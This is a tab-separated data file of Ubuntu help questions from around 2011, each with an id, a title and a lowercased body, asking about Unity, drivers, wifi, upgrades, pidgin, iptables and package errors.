67283	is it possible to make writing to .bash_history immediate ?	i often open lots and lots of terminals [ right now i have 7 open on this workspace ] and i often search history with grep to find a command i 've just written recently , but i do n't want to hunt down the terminal and then scroll up and hunt for it more , etc.. sometimes my terminals close without 'exit , ' and everything i 've written is lost [ sometimes i 've needed something i 'd written in a terminal that was killed ] . so is there a way to make it so each terminal writes to .bash_history immediately ? or at least once a minute , or something like that ?
67285	virtualbox start up error glib-gio : error	after installed successfully , in terminal typed virtualbox , it has the following error # virtualbox ** glib-gio : error : /build/buildd/glib2.0-2.28.6/./gio/gdbusconnection.c:2279 : initable_init : assertion failed : ( connection- > initialization_error == null ) aborted http : //s7dhansh.wordpress.com/category/comp/linux/ i use chmod +x ed.sh then ./ed.sh virtualbox , then no response ubuntu 11.04 and virtualbox-4.1
67286	pidgin does n't show buddy list ?	i like to use pidgin instead of empathy because i 'm used to it , and because i have to venture into windows for more development than i would prefer . in ubuntu 11.10 , i ca n't find any way to get to the buddy list . it opens , and just sits there in the messenger panel tray thing . from its previous behavior , i believe pidgin usually starts up minimized -- you have to click on its system tray to show the buddy list . the messenger applet does not seem to support this functionality . is this a bug , or am i just missing something obvious ?
67287	mounting ntfs directory from within vmware image	i 'm running ubuntu 11.10 as a guest in vmware player on a windows 7 laptop and would like to mount an ntfs directory in ubuntu but not sure how to go about it . all the directions i 've found are written from the perspective that linux is running in a dual-boot environment whereas from inside the guest environment i do n't have any ntfs in fdisk . fdisk -l : disk /dev/sda : 21.5 gb , 21474836480 bytes 255 heads , 63 sectors/track , 2610 cylinders , total 41943040 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0008a459 device boot start end blocks id system /dev/sda1 * 2048 40894463 20446208 83 linux /dev/sda2 40896510 41940991 522241 5 extended /dev/sda5 40896512 41940991 522240 82 linux swap / solaris i was expecting to see an ntfs device though as i 'd enabled shared folders in my virtual machine settings . can someone point me to to some info on the matter ?
67289	can juju use an existing zookeeper cluster and/or scale its own zookeeper for ha ?	i 've read that juju uses zookeeper . i assume zookeeper runs on the bootstrap node ? is there any way to use a pre-existing zookeeper cluster ? similarly , is there a way to have juju bootstrap launch a cluster instead of a single node ?
67292	is the wine ppa still needed for an up to date wine version	i see that the 1.3 dev package is found in the 11.10 version of ubuntu but i am wondering if it still needed to use the ppa maintained by scott or was it merged somehow to the ubuntu repositories by default . for what i see the wine 1.3 that comes with ubuntu is the 1.3.28 version and the one scott has in his ppa is the latest 1.3.30 . so my questions regarding this are : will the ubuntu version update soon to be in sync with the ppa or latest wine version . is the ubuntu version of wine 1.3 a different version of wine that is maintained separate from the ppa one ( which is also a 1.3 version and this is the confusion ) . what happens if i add the ppa to the repositories . will it create some conflict between both 1.3 or will the latest be the one selected .
67293	facial recognition stopped working and now can not login	i 've been using ubuntu 11.04 for a few days . i installed face authentication login ( i think it 's 2.1 something ) with the terminal . it was working well , but now what happened a few times later is it scanned my face , passed and says 'face verify authentication has started ' , for half an hour without moving . i just ca n't get in . please reply , i 'm really in trouble . i have to solve this problem before my school opens .
67296	why does dhclient < interface > return a services related message ?	i 'm trying to use dhclient to set up a tether with dhclient , which worked in 11.04 . however , upon upgrading to 11.10 , i get the following message when trying to use it . rather than invoking init scripts through /etc/init.d , use the sevice ( 8 ) utility , e.g . service smbd reload since the script you are attempting to invoke has been converted to an upstart job , you may also use the reload ( 8 ) utility , e.g . reload smbd rtnetlink answers : file exists
67305	what is the best way to integrated my google calendar with my ubuntu ?	i know that you can integrated google calendar with evolution , but it does n't seems to work for me . once i add something to my google calendar , it never updates with evolution . and please do n't send me to this link https : //help.ubuntu.com/community/googlecalendarwithevolution because i follow the instructions a lot of times and nothing works . thanks .
67310	will nautilus elementary be available for 11.10 ?	i 'm just used to nautilus elementary . can i install it on ubuntu 11.10 ?
67311	how to install multiple apps in software center ( similar behavior of synaptic )	i wish to select multiple apps in software center and then tell it to install them . same as the behavior of synaptic where i select multiple ones and the click install . this saves many clicks for me and much time . is there an option for this . the multiple selection also includes the ability to select as synaptic does , doing double click on an app . is there an option for this in software center . for example , to double click vlc and have it install automatically without going to the information window about vlc and clicking on install . it is nice but very annoying if am suppose to install via gui 20 , 30 apps . as a side note i actually like the new changes and look and feel of the software center now , but the intuitive and more friendly nature of synaptic with details like this is what is needed .
67312	how do i enable the pidgin system tray icon ?	i want to enable the system tray icon for pidgin in ubuntu 11.10 ( with unity ) , but i do n't see it . i have to start it again and again from the launcher panel or from the dash . is there a workaround to show the system tray icon in unity ? i think it 's the same behavior for skype and some other applications also .
67313	network connections - able to connect to wireless but network connections does not display my connection	im using ubuntu oneiric and ar9285 wireless network adapter . i can connect to my wireless network without problem . however when i click the `` network connection '' icon on system tray , it is disabled and it says `` wireless network device not managed '' . when i checked it on terminal using `` iwconfig wlan0 '' , it seems ok. wlan0 ieee 802.11bgn essid : '' dd-wrt '' mode : managed frequency:2.462 ghz access point : 00:22:6b:58 : e6 : d0 bit rate=54 mb/s tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=69/70 signal level=-41 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:445 missed beacon:0 how do i fix this ?
67315	after installing the proprietary nvidia driver , my boot splash is very large and stretched . any fix ?	i know there have been solutions for previous versions of ubuntu , but what is the best way to go about it now ? as an aside , if i have it disabled the splash is fine , but before the login manager shows there is a weird torn up flicker of sorts . any help is appreciated .
67316	drush folder after installation ?	i installed drush with the ubuntu command apt-get install drush a which drush reveals the following output : /usr/bin/drush thus my question : i would like to manually update drush as well as adding files like an example.alias.php file to that folder , however , /user/bin/drush is n't actually a folder but the php file itself . where can i find the drush folder ?
67321	ubuntu wifi is slow after upgrade	after my latest ubuntu distro upgrade to version 11.10 , wireless connection became extremely slow . the upgrading procedure failed on configuration files update dialog and i rebooted the laptop and run apt-get upgrade ... could that be because of misconfiguration or wrong driver ? any ideas ?
67322	how to set different keys for showing dash and for showing keyboard shortcuts	i am using oneiric and after using a few days i am happy with the dash and unity in general . i have one minor problem i run into too many times . since the same button ( super ) is used for showing dash ( tap ) and the launcher shorcuts ( keep pressed ) , both actions end up mixed up much of the time . i was wondering , is there is a way to have to different shortcuts for those 2 actions instead of using the same button ? any hack will do for me . thank you .
67325	help ! crash during upgrade amd64 11.04 - > 11.10 now el deado-meato	i started what i thought was a standard upgrade , using the normal gui stuff . part way through , it apparently put up a dialog asking if i wanted to keep the old apparmor config file or not . i was not at the console . the the screensave apparently kicked in . then it appeard totally dead . i tried several things , but it appears that the combination broke the upgrade . on a second machine i was also doing the upgrade . on it , i just killed gnome-screensaver and nothing else . the got in with vnc ( actual screen/kb unresponsive ) and it appears to be going . maybe to completion . on the first machine , i think i had queued up an alt-f1 before getting screensaver killed , and i could not get the gui back . so i eventually rebooted . how can i resume the upgrade , repair the installation do something so i do n't have to reformat all the partitions and start over ? that would be suboptimal .
67329	how to stop nautilus managing desktop in unity	since 11.10 nautilus shows my desktop in unity . as i remember correctly , tthis was n't in 11.04 . how can i disable that ?
67330	libreoffice application does not use unity launcher	please fine below the image . in this , you may observe that though libre writer is up , unity launcher does not have blue arrow . and clicking on it , does not bring back the application window . any pointers . i am on 11.10 .
67337	how do i get rid of this monitor error ?	i have an nvidia card and two monitors . every time i log in to unity on ubuntu 11.10 , i get this error : '' could not apply the stored configuration for monitors '' i have tried opening nvidia-settings , but none of my experimental alterations to any of the settings has made a difference . i can still use my computer , but it seems to break the themes , icons , and styles so my computer looks like unix circa 1992 , which is a pretty annoying . how do i kill this error ?
67340	how do i use a launchpad recipe for patching and building an original package ?	i have a patch against vim which applies to packaged version . i would like to automate this , so that when new ubuntu is released , the newer unpatched vim gets patched & built using a recipe . i read documentation on recipes , though i am not sure how to apply a patch . should i create branch with modified source and have the recipe merge it ? how does that handle when patched branch gets out-of-date with the distro package in newer release ? ( the patch will very likely still apply ; but will the branches be able to merge as well ? )
67343	caffeine + xscreensaver = not working	had removed gnome-screensaver and uses xscreensaver , but caffeine does n't seems to work when watching movie using smplayer even added both smplayer and mplayer into the activation list . anyone got any ideas ?
67348	no audio in adobe flash	i am on 11.10 64bit and i have installed flash from http : //get.adobe.com/flashplayer/otherversions/ . i had downloaded install_flash_player_11_linux.x86_64.tar.gz and moved libflashplayer.so to ~/.mozilla and ~/.mozilla/plugins i also have oss installed because alsa does not work for me . i generally follow steps mentioned at https : //help.ubuntu.com/community/opensound and everything works fine . but for 11.10 , flash has no sound . i am not sure if that is oss problem .
67350	fixing broken unity configuration on clean install using old home directory ?	my computer locked up during upgrade to 11.10 . i ended up copying my whole home directory to a second partition and reinstalling marking that partition as mount point for home and not formatting . i had to fix some permission/ownership issues on ~/.iceauthority and then recursively chowned the home directory . after reboot i was able to log in successfully . after logging in there is no side bar . at the top i have the file/edit/view/../help menus but i cant seem to get anything to run . i 've been googling , trying to find a command-line solution to reset all ui settings to default since i 'm sure is some of the configuration files in my home directory thats screwing it all up but i have n't found anything that works . i really would like to get ubuntu back working by monday or i 'll have to boot up into windows and ssh into the school linux server to get my work done .
67352	not all my hdds available to mount on first boot	got a `` little '' problem with my ubuntu installation . not all my hdds are available on the first boot ... well , at least if i boot into ubuntu on the first boot , which takes ages btw . if i start my computer , load up windows , restart and boot into ubuntu everything is fine . but if i start my computer and boot directly into ubuntu it takes very long , gives me a lot of errors and then not all of my hdds are available in ubuntu . this is not only with 11.10 , had this since 10.04 i think . doesnâ´t happen on opensuse ( just tested it for gnome shell lol ) . can someone help : - ) ?
67353	disable auto-hide for the global application menu in unity	in ubuntu 11.04 auto-hide of global application menu was impossible to turn off , what about ubuntu 11.10 ?
67355	how do i completely turn off screensaver and power-management ?	i looking for a method to turn-off the screensaver and powermanager but from the command line . i 'm aware this can be done via the gui screen - but can this be done via the command line or via some configuration editor ? here is the gui way ( via the `` screen '' or `` brightness and lock '' application ) :
67360	delete extra toolbar on top of the screen in gnome fallback mode ?	clean install to 11.10 , trying to keep gnome classic . i 've installed gnome-session-fallback and removed unity via software center , and this toolbar still wo n't go away . has anyone had any problems like this trying to keep classic
67362	what is the black header widget in some programs ?	in some of the ubuntu programs ( ubuntu control panel , system settings ) , but not e.g . in banshee , the top part of the window contains elements in dark tone ( with the ambience theme ) . but i cant find a standard widget that does this automatically . are these colors all set by hand ( instead of standard widget+theme ) ? and if they are set by hand , where do they come from in the theme ( what are the parameters in gtk_widget_modify_bg ( widget , gtk_state_normal , & color ) ) ? edit : it does not seem to be a simple gtk.toolbar . if i run the following code : from gi.repository import gtk window = gtk.window ( ) window.set_default_size ( 200 , -1 ) window.connect ( `` destroy '' , lambda q : gtk.main_quit ( ) ) toolbar = gtk.toolbar ( ) window.add ( toolbar ) toolbutton = gtk.toolbutton ( stock_id=gtk.stock_new ) toolbar.add ( toolbutton ) window.show_all ( ) gtk.main ( ) i get a window like this : which does not have a dark tone for the toolbar . edit2 : although the 'toolbar with special context ' answer by j-johan-edwards is true in most of the programs , it is not the case in the ubuntuone-control-panel . this program has a gtkvbox which can include any range of widgets ( unlike a toolbar ) . i 'm still unable to determine how the gtk-theme knows how to paint that part of the window . but anyway : for now a toolbar is enough for me ...
67363	change background of certain websites black ?	example would be inverting the background color of sites like google , reddit , and changing the text color to white or blue . also , gconf-editor does n't seem to work when trying to rearrange the buttons on my windows , did something change with 11.10 ?
67366	what application is recommended to find dead pixels on lcd panel ?	i suspect there are few of hot pixels on my panel . as it is still under warranty and by the rules of my vendor i can replace a machine if panel has a 3 dead pixels on it , i 'd like to check how many dead pixels there actually are . in windows , there are plenty of simple applications that just fill the whole screen with different colors so hot/dead pixels are easily visible . does something like this exists for ubuntu ?
67373	search for applications ( not in $ path ) from unity dash	i have some applications like eclipse , netbeans , vuze extracted to /opt/ directory . these applications dont show up while searching in unity dash . is there i can get these applications indexed ? ( 'run a command ' does remember the paths after the first time , but pressing the super button is easier than 'alt+f2 ' ) thanks .
67374	how to select other workspaces in the workspace spread ?	i am using ubuntu 11.10 in sony vaio . the workspace manager worked in the beginning . but now , when clicking on the workspace button , the 2x2 grid is displayed . only the upper left workspace is highlighted and the other workspaces are black and faded . only the upper left is selectable , which means i effectively have only one usable workspace . i tried ccsm but changing the grid size there had no effect at all .
67381	making google calendar and gmail the `` default applications '' for calendar and mail	i wish to integrate the gmail and google calendar web interfaces with unity . this means several things . in system info > default applications set firefox 'https : //mail.google.com/mail/ ? shva=1 # inbox ' as the mail command . this would obviously require me to somehow add a custom command to the list of gnome3 's default applications for mail . in system info > default applications set firefox 'https : //calendar.google.com ' as the calendar command . when clicking on the date in the upper right , and selecting `` add event ... '' run firefox 'https : //calendar.google.com ' . when clicking a mailto link somewhere open it in gmail with the `` to : '' field set correctly . perhaps something like firefox 'https : //mail.google.com/mail/ ? extsrc=mailto'url= % s . bonus points for also doing this when trying to mail a file from nautilus . hints : i assume that ( 1 ) and ( 2 ) are achievable through setting some kind of .desktop files in ~.local/share/applications/ but the things i tried have n't worked . i also guess that ( 3 ) and ( 4 ) might require some editing of /desktop/gnome/url-handlers in gconf-editor . edit : it seems that an elegant solution will finally be possible in 12.10 with integration of web apps .
67382	add custom command in the open with dialog ?	in earlier versions of ubuntu ( 10.10- ) there was an option in the `` open with '' tab in the properties window , to add a custom command to open a file . however , this is no longer the case in ubuntu 11.10 . is there any way that i can add these file type associations with a command of my choice rather than the applications detected by the system .
67386	ca n't enable unity 2d	i 've just installed ubuntu 11.10 and have done a full update . i have found that standard unity is just too much for my laptop , so i thought i should enable unity 2d from the login menu . however , when i do enable unity 2d , it seems to continue to load standard unity . why is this happening ? how can i check if it actually has loaded unity 2d instead of standard unity ?
67387	how to get ubuntu classic back on ubuntu 11.10	there is a gnome classic i tried that but it 's not the same . it 's so ugly . and if we ca n't get back ubuntu classic then please tell me how to remove that ugly pannel in the left side . please help me .
67388	how to default to unity 2d on auto login	when i auto-login it gives me unity 3d . how do i change the default to the 2d counterpart ?
67390	hp pavilion g6 shutdown thermal overheating	my hp pavilion g6 notebook has the following configuration : intel core i5 processor 6 gb ram 1 gb dedicated ati graphics . it has dual boot system with windows 7 home basic 64 bit and ubuntu 11.10 64 bit installed . the installation process was ok. and i am facing no problem in using the ubuntu distro . but the problem that i am facing is that ... whenever i am shutting down my notebook , after resuming the notebook , i am getting a message that `` thermal power overheating ... .. '' . for windows 7 , there is no problem during shutdown . only for ubuntu and any other linux , it is giving the problem . please tell me how to get rid off this problem . thanks , biplab banerjee
67391	despite running without problems , my battery indicator says `` ( not present ) '' still - what can i do about this ?	every time i restart me computer i have to go into system settings to turn the brightness on my screen back up to full and the computer thinks there 's no battery - there definitely is ! apart from that i 've had no performance issues , it 's just dang annoying and i do n't understand it , because it was working fine last night , the indicator-battery was displaying correctly , but when i turned on my computer this morning ( like nine hours later ) , it was broken . any help will be sincerely appreciated . thanks !
67393	wireless slow on an intel agn5100 on an hp presario c45	i have installed ubuntu 11.10 on my laptop yesterday , everything worked fine except for the wireless , which is very very slow compared to xp on the same machine . i didnt have this problem when using older versions of ubuntu i.e . ( 10.04 , 10.10 , 11.04 ) . i 'm using intel agn 5100 ( i think the linux kernel had integrated support for this network card ) , on a hp presario cq45 . any suggestions on how to make it faster ?
67394	how to import settings of opera from windows 7 to 11.10 ?	i want to import all the settings including bookmarks , speed dial , etc from opera in windows to ubuntu 11.10 . tell me how to do so .
67397	why does déjà dup say there is no space left ?	i 'm trying to backup my home directory ( excluding a few folders ) . the backup is saved on a ~300 gb partition ( called backups ) of an internal drive , but not the same drive as the home directory . when i try to backup , everything goes ok until at some point déjà dup says there is no space left on `` backups '' . the problem is that déjà dup only used ~20 gb at this point , so there is a ton of space left . i tried several times without luck . why is déjà dup saying this ? the size of my home directory , without the excluded folders , is 136 gb .
67402	graphic bug in unity , messy background for dash and launcher	since the oneiric update , after some usage the dash and the launcher backgrounds ( when open ) become messy . here you can see a screenshot : sometimes , i also noticed ( do n't know if it 's a bug ) that the dash shows the desktop behind , even if i have an application open . and also i noticed that when you change desktop background , the dash always shows the same background . this become evident when i use the wallpaper that change through the day . many thanks in advance ! ! edit : i will report the bug for sure . here you can see the `` see-through '' behaviour i was talking about . is this a bug ?
67405	auto-mounting network shares per user	i have a server that has a number of cifs shares that need to be accessed on a per-user basis . for example , i have a music share which i have full access to , but my wife has read-only access . when either myself or my wife log into our ubuntu 11.04 laptop i would like these shares to be automatically mounted per user . now i understand that if i mount as -t cifs without specifying a user then it will use the user environment variable . however , i also need to specify a password , so how can i do that when each user has a different password ? i think my questions are : is there a way for me to have a per-user /etc/fstab ? if not , is there a way to specify that a mount is only applicable to a certain user ? also , the share password is always the same as the local password . is there a way to specify that this password should just pass through from the client to server rather than having to specify it in a credentials file somewhere ? or maybe i 'm missing something and there 's a completely different solution . can anyone help ?
67406	can either gnome 3 or unity be customized to simulate a gnome 2 style interface ?	i am looking for a somewhat comprehensive guide for customizing either gnome 3 or unity to look as much as possible like gnome 2 . i have seen this question come up , but the most common answer is that people should simply log in with gnome `` classic '' . the reason this is not a sufficient answer is because , in my experience , within the `` classic '' interface , not everything that makes up the interface is compatible with each other . for example , some applets not working , and themes not displaying entirely correctly . the ideal scenario is to have the advantages of the more efficient and updated code that gnome 3 and unity are built on , but to customize it so that a user can create the interface they are most comfortable with . in my case , that is a gnome-2 like interface . i hope to not have any political discussion about whether or not unity and/or gnome 3 changed for better or worse . i just want to be able to do what i think makes linux great : customize . so , what would be the steps to recreate gnome 2 ?
67410	problem upgrading 11.04 to 11.10	i have tried to upgrade from 11.04 to 11.10 using the upgrade manager but it does n't work . it gives the message that i copy below . could you tell me how to update ubuntu ? no se ha podido inicializar la informaci贸n de los paquetes ha ocurrido un problema imposible de corregir cuando se inicializaba la informaci贸n de los paquetes . por favor , informe de esto como un fallo en el paquete 芦update-manager禄 e incluya el siguiente mensaje de error : 'e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/es.archive.ubuntu.com_ubuntu_dists_natty_main_binary-i386_packages , e : no se pudieron analizar o abrir las listas de paquetes o el archivo de estado . '
67411	gnome shell interface questions	ok , after my upgrade to 11.10 and toying around with the new unity , i am now trying out gnome shell . i really like the dash in gnome shell ( when you press super ) . it feels i can get quick access to anything in my system . what is not obvious to me : how can i add a launcher to my favorites ? how can i open a second instance of an application from my favorites ? ( i tried the scroll-wheel click , but it opens a second instance of the application in another workspace ) is there a list of shortcuts somewhere ( as there is for unity ) ? i did have a look at the documentation at http : //gnome.org , but that was a bit meager .
67413	unity launcher missing , top panel changed colour , no controls on the right hand side of the top panel	i 've just installed 11.10 and am having some big problems . after installing updates and programs i wanted i did a restart which was apparently necessary for changes to take place . now my unity launcher is completely missing , my nice dark top panel is now the standard yucky grey and i 'm missing all the email and user controls on the right hand side of it , including the ones to turn the computer on and off . does anyone know how i can deal with this ? thanks !
67414	is it possible to disable empathy from autostarting on login ?	how to disable empathy auto startup ? i turned it off in properties , but every time i restart notebook it starts automatically . maybe there is a deamon thats starts it
67415	i ca n't see my login screen after upgrade , only dots	i cant seem to see my login screen after upgrade to 11.10 . it just show the ubuntu dots . how come ?
67416	intel gma3150 on samsung n150	i 'm new and proud owner of ubuntu on my samsung n150 . everything seems to work fine , even the brightness which was an small issue in compare to intel media graphics accelerator ( gma 3150 ) . i 've read many tutorials through last days , but as i 'm a complete beginner in ubuntu system , i ca n't get to work it out . in my system preferences the graphics card is unknown . i 've installed some small .deb ( intel-gpu-tools_1.0.2+git20100830+c935c60-0ubuntu0sarvatt_i386.deb ) . but it 's not working for me . please , anyone help me ! and thanks for your struggle to help me with this small problem .
67419	can not update and install any software after installing clamav ?	after i install clam antivirus i get an error : http : //pastebin.ubuntu.com/709447/.. when using ubuntu software center i tried to repair the broken package but it give an error like this : failedinstallarchives ( ) failed : preconfiguring packages ... preconfiguring packages ... preconfiguring packages ... ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 139566 files and directories currently installed . ) unpacking clamav-base ( from ... /clamav-base_0.97.2+dfsg-1ubuntu2_all.deb ) ... dpkg-deb ( subprocess ) : data : internal gzip read error : ' < fd:0 > : data error' dpkg-deb : error : subprocess < decompress > returned error exit status 2 dpkg : error processing /var/cache/apt/archives/clamav-base_0.97.2+dfsg-1ubuntu2_all.deb ( -- unpack ) : subprocess dpkg-deb -- fsys-tarfile returned error exit status 2 no apport report written because maxreports is reached already processing triggers for man-db ... errors were encountered while processing : /var/cache/apt/archives/clamav-base_0.97.2+dfsg-1ubuntu2_all.deb error in function : dpkg : dependency problems prevent configuration of clamav-freshclam : clamav-freshclam depends on clamav-base ( > = 0.97.2+dfsg-1ubuntu2 ) ; however : package clamav-base is not installed . dpkg : error processing clamav-freshclam ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of clamav : clamav depends on clamav-freshclam | clamav-data ; however : package clamav-freshclam is not configured yet . package clamav-data is not installed . package clamav-freshclam which provides clamav-data is not configured yet . dpkg : error processing clamav ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of clamtk : clamtk depends on clamav ( > = 0.95 ) ; however : package clamav is not configured yet . clamtk depends on clamav-freshclam ( > = 0.95 ) | clamav-data ; however : package clamav-freshclam is not configured yet . package clamav-data is not installed . package clamav-freshclam which provides clamav-data is not configured yet . dpkg : error processing clamtk ( -- configure ) : dependency problems - leaving unconfigured now i can not install other software whether using ubuntu software center or terminal .
67420	i can not find /sys/kernel/debug/vgaswitcheroo/switch ubuntu 11.10	linux segavax-ul80vt 3.0.0-12-generic # 20-ubuntu smp fri oct 7 14:56:25 utc 2011 x86_64 x86_64 x86_64 gnu/linux where can we find ?
67423	''error : oops , something went wrong '' on mobile phone htc	when i 'm trying to open a cloud mp3 file on my mobile phone ( htc desire z ) with the app ''ubuntu one '' there is always a download failure with a report ''error , oops , something went wrong '' . same error , motorola xoom . tried removing account , uninstalling music and files , and re-installing , same error still .
67426	reopen tabs plugin for gedit not found	i upgraded to ubuntu 10.10 a few days ago , and since then have not been able to use one of my favourite plugins for gedit , reopen-tabs , which restores the tabs that were open when gedit was last closed . all of the files are in the correct place in ~/.gnome2/gedit/plugins , but when i go to edit- > preferences- > plugins , it does n't show up as it used to do . i ca n't think of any reasons why it is n't being detected , but i 'm not exactly an expert linux user , so i imagine i 'm being dense . any input would be really appreciated ( even if it 's an alternative plugin that does the same thing automatically ( ie not session saver ) ) .
67428	`` permission denied '' error when changing the default applications	i 'm trying to change the default applications in ubuntu 11.10 and i fail to do so . i go to system info > default applications and i make some changes . if i close and reopen the system info window , the changes have reverted to the old ones . also if i go to a .avi for example > properties > open with and i try to set as default something else , i get could not set as default error while setting `` vlc media player '' as default application : failed to create file '/home/george/.local/share/applications/mimeapps.list.wcoc3v ' : permission denied
67429	can i disable title bar on unity dual screen ( second monitor )	when i run some applications that use dual screen the top menu bar is still there . is there any way to remove top menu bar on second screen ?
67430	my fresh installation does n't load . ( pulseaudio problem )	i made a fresh installation of ubuntu 11.10 beside an old w7 and another ubuntu installation . when i started my netbook and chosed the new installation to boot , it does n't load and it stops in a screen that says me : * ( ... ) * starting bluetooth * pulseaudio configured for per-user sessions saned disabled ; edit /etc/default/saned ) and the * symbol in the pulseaudio appears in orange , while other in other lined appear in normal white . i would appreciate if anybody could give any piece of advise or orientation . thank you in advance .
67432	cant run foxitreader after installing it	i 'm trying to install foxit reader . i 've downloaded the .deb , opened with ubuntu software center ( or gdebi , etc ) and clicked install . the progress bar do her job and an icon appears when i search for foxit on launcher . it is also present in the menu , in synaptic manager , and is seen by other launcher application like synapse . but it does n't start . it is not present in usr/bin and is not seen by alt-f2 ( run ) , so it is not properly installed . if i open again usc , foxitreader appears as not installed . restarting the deb file in gdebi it does not seem installed ( the note that a version is already installed , and the options of reinstall , remove etc are all absent ) . ideas ?
67435	install ubuntu-desktop on ubuntu using ubuntu iso image	ok so im in a bit of a pickle here . i have a 6 year old laptop which through the years lost a cd drive and doesnt have any options to boot using a usb stick . i somehow managed to install ubuntu using pxe boot taking the ubuntu distro from us.archive.ubuntu.com . when i start my system i see that there is no ui available and when i do a uname i get the following : linux machinename 2.6.31-23-generic # 75-ubuntu smp i want to install ubuntu with gnome on my machine , and i have a .iso image of ubuntu 10.04 . is there a way to install another ubuntu version ( fresh install on a partition would also work ) from within ubuntu using .iso image ? any help is greatly appreciated . ps : much better for me would be to install the ubuntu netbook version or its better to install a simple ubuntu desktop version ?
67437	how do i install a driver for an atheros ar9285 ?	how to install the driver for atheros ar9285 in ubuntu 11.10 . still no package for 11.10 according to this https : //help.ubuntu.com/community/wifidocs/device/atheros/ar9285 here is the output of the commands marc @ fer-vpcya1v9e : ~ $ sudo lshw -class network *-network disabled description : wireless interface product : ar9285 wireless network adapter ( pci-express ) vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 4c:0f:6e : d6:65 : cc width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.0.0-12-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:16 memory : d3400000-d340ffff *-network description : ethernet interface product : ar8131 gigabit ethernet vendor : atheros communications physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : c0 serial : 54:42:49 : a2:1f : bc capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.0-napi firmware=n/a latency=0 link=no multicast=yes port=twisted pair resources : irq:43 memory : d2400000-d243ffff ioport:1000 ( size=128 ) and the second command marc @ fer-vpcya1v9e : ~ $ rfkill list 0 : sony-wifi : wireless lan soft blocked : no hard blocked : no 1 : sony-bluetooth : bluetooth soft blocked : no hard blocked : no 2 : phy0 : wireless lan soft blocked : no hard blocked : no 3 : hci0 : bluetooth soft blocked : no hard blocked : no 4 : acer-wireless : wireless lan soft blocked : yes hard blocked : no is there a way to make it work ?
67438	ubuntu 11.04 and slow internet experience	i am running ubuntu 11.04 on my desktop with wired internet connection and i am experiencing slow internet connection while the same connection works good for windows machine so it is fix that there is not h/w issue googling this turned into there are some driver issue with ubuntu 11.04 i found this but does n't work for me . jigar @ jigar-desktop : ~ $ sudo lshw -class network [ sudo ] password for jigar : *-network description : ethernet interface product : 82579v gigabit network connection vendor : intel corporation physical id : 19 bus info : pci @ 0000:00:19.0 logical name : eth8 version : 04 serial : e0:69:95 : a3 : ea:1e size : 100mbit/s capacity : 1gbit/s width : 32 bits clock : 33mhz capabilities : pm msi bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e1000e driverversion=1.3.10-k2 duplex=full firmware=0.13-4 ip=192.1.200.106 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:42 memory : fe500000-fe51ffff memory : fe528000-fe528fff ioport : f080 ( size=32 )
67439	how to restore the top panel ?	i 've upgraded my desktop from natty to oneiric . now the top panel has wrong theme and some indicators are missing ( sound , power , etc. ) . also , icons in launchers and on the desktop are missing or corrupted : logging with other users in same pc is no issue ; in that case the top bar is correct . i 've also filed a bug in launchpad . is there a way to restore the bar ?
67441	which input rules do i need to add to iptables so apt ( apt-get , aptitude ) can work ( update , upgrade , search , install ) ?	i need to use aptitude to update and install software but it fails . it says ... 0 % [ connecting to archive.ubuntu.com ] ... and halts . i need to type ctrl-c to move out . i 'm using ubuntu server 10.04 lts ( lucid lynx ) . this is happening due to my iptables rules . if i restore iptables to its defaults ( by removing rules and setting policies to accept ) , then aptitude works as expected . no errors anymore . but , hey , i want to use my iptables rules ... i just need to know : what exactly i need to keep open to make apt work ? my rules are quite simple . output policy is accept . forward policy is accept . and i have no rules for output and forward . input policy is drop . so , the problem is in the input chain ! i have 11 input rules to open specific tcp ports that i need to run services like ftp , ssh , http , etc . an additional rule to accept icmp ( ping ) , and other to accept all localhost input . and this is all : iptables -f iptables -a input -s 127.0.0.1 -j accept iptables -a input -p icmp -j accept iptables -a input -p tcp -- dport 21 -j accept iptables -a input -p tcp -- dport 22 -j accept iptables -a input -p tcp -- dport 25 -j accept iptables -a input -p tcp -- dport 80 -j accept iptables -a input -p tcp -- dport 443 -j accept iptables -a input -p tcp -- dport 587 -j accept iptables -a input -p tcp -- dport 995 -j accept iptables -a input -p tcp -- dport 1008 -j accept iptables -a input -p tcp -- dport 2812 -j accept iptables -a input -p tcp -- dport 3306 -j accept iptables -a input -p tcp -- dport 8000 -j accept iptables -p input drop i tried lots of rules trying to make aptitude work . of course a simple iptables -p input accept makes it work , but i do n't want to accept everything . i want to open only what is needed for aptitude to do its job . it sounds strange to me that the input chain is the issue ... but it is . another issue is that i have no access to iptables logs ... i have just found there is a bug in the kernel i am using ( see http : //serverfault.com/questions/159818/iptables-logging-not-working ) ... so , do n't ask me for the log contents , because i am unable to have them . thank you !
